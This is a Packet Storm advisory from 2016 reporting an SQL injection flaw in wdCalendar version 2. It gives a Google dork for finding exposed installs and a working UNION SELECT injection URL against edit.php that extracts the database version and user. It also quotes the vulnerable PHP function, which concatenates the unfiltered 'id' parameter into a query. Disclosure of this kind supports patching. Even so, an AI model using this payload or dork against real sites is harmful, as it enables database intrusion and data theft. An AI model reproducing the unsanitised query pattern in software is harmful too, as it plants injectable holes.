wdCalendar 2 SQL Injection

2016-09-13T00:00:00
ID PACKETSTORM:138704
Type packetstorm
Reporter Alfonso Castillo Angel
Modified 2016-09-13T00:00:00

Description

                                        
                                            `# Exploit Title: wdcalendar version 2 sql injection vulnerability  
# Google Dork: allinurl:"wdcalendar/edit.php"  
# Date: 12/09/2016  
# Exploit Author: Alfonso Castillo Angel  
# Software Link: https://github.com/ronisaha/wdCalendar  
# Version: Version 2  
# Tested on: Windows 7 ultimate  
# Category: webapps  
  
* Affected file -> edit.php and edit.db.php  
* Exploit ->  
http://localhost/wdcalendar/edit.php?id=-1+union+select+1,version(),user(),4,5,6,7,8,9--  
  
  
* Vulnerable code:  
  
function getCalendarByRange($id){  
try{  
$db = new DBConnection();  
$db->getConnection();  
$sql = "select * from `jqcalendar` where `id` = " . $id; //the  
variable is not filtered properly  
$handle = mysql_query($sql);  
//echo $sql;  
$row = mysql_fetch_object($handle);  
}catch(Exception $e){  
}  
return $row;  
}  
if($_GET["id"]){  
$event = getCalendarByRange($_GET["id"]); //the variable is not filtered  
properly  
  
`